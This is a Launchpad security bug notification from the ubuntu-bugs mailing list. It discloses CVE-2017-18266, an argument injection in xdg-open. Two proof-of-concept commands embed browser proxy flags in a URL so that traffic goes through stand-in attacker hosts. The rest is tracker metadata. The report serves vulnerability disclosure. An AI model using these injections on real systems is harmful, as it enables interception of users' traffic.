*** This bug is a security vulnerability ***

Public security bug reported:

An attacker can silently set their proxy in browser settings to capture
user's traffic, using a malformed URL in xdg-open.

The following command tries to open Yandex main page though third-party
proxy server.

    env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-
proxy evil-site.example.org:8080'

Another sample of an exploit with Chromium browser.

    env -i BROWSER="chromium %s" xdg-open "http://www.example.com/
--proxy-pac-url=http://dangerous.example.net/proxy.pac";

** Affects: xdg-utils
     Importance: Unknown
         Status: Unknown

** Affects: xdg-utils (Ubuntu)
     Importance: Undecided
     Assignee: Nicholas Guriev (mymedia)
         Status: New

** Changed in: xdg-utils (Ubuntu)
     Assignee: (unassigned) => Nicholas Guriev (mymedia)

** Information type changed from Private Security to Public Security

** Bug watch added: freedesktop.org Bugzilla #103807
   https://bugs.freedesktop.org/show_bug.cgi?id=103807

** Also affects: xdg-utils via
   https://bugs.freedesktop.org/show_bug.cgi?id=103807
   Importance: Unknown
       Status: Unknown

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18266

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1772295

Title:
  CVE-2017-18266: argument injection in xdg-open

To manage notifications about this bug go to:
https://bugs.launchpad.net/xdg-utils/+bug/1772295/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

Reply via email to